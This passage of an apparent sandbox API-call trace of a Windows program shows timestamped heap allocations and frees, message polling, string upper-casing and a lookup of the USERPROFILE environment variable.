lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0221.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.911] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0221.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0221.911] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0221.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0221.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.912] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0221.912] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0221.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0221.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0221.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0221.914] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0221.914] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0221.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0221.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854470 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0221.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0221.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0221.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0221.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0221.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0221.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0221.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0221.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0221.917] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0221.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0221.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0221.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0221.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0221.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0221.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0221.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: 